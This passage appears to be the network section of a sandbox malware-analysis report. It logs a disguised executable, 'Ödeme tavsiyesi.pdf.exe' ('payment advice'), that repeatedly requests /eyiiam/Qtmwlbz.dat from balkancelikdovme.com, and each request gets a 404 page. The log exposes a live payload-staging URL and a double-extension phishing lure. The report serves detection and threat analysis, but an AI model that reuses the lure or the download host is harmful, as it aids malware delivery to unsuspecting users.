      2024-12-16 13:18:48 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      35192.168.2.749867185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:49 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:50 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:49 GMT
      vary: User-Agent
      2024-12-16 13:18:50 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      36192.168.2.749872185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:51 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:52 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:51 GMT
      vary: User-Agent
      2024-12-16 13:18:52 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      37192.168.2.749876185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:53 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:54 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:53 GMT
      vary: User-Agent
      2024-12-16 13:18:54 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      38192.168.2.749882185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:55 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:56 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:55 GMT
      vary: User-Agent
      2024-12-16 13:18:56 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      39192.168.2.749888185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:57 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:57 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:57 GMT
      vary: User-Agent
      2024-12-16 13:18:57 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      40192.168.2.749894185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:59 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:59 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:59 GMT
      vary: User-Agent
      2024-12-16 13:18:59 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      41192.168.2.749899185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:01 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:01 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:01 GMT
      vary: User-Agent
      2024-12-16 13:19:01 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      42192.168.2.749904185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:03 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:03 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:03 GMT
      vary: User-Agent
      2024-12-16 13:19:03 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      43192.168.2.749910185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:05 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:05 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:05 GMT
      vary: User-Agent
      2024-12-16 13:19:05 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      44192.168.2.749915185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:07 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:07 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:07 GMT
      vary: User-Agent
      2024-12-16 13:19:07 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      45192.168.2.749919185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:08 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:09 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:09 GMT
      vary: User-Agent
      2024-12-16 13:19:09 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      46192.168.2.749924185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:11 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:11 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:11 GMT
      vary: User-Agent
      2024-12-16 13:19:11 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      47192.168.2.749930185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:12 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:13 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:13 GMT
      vary: User-Agent
      2024-12-16 13:19:13 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      48192.168.2.749936185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:14 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:15 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:15 GMT
      vary: User-Agent
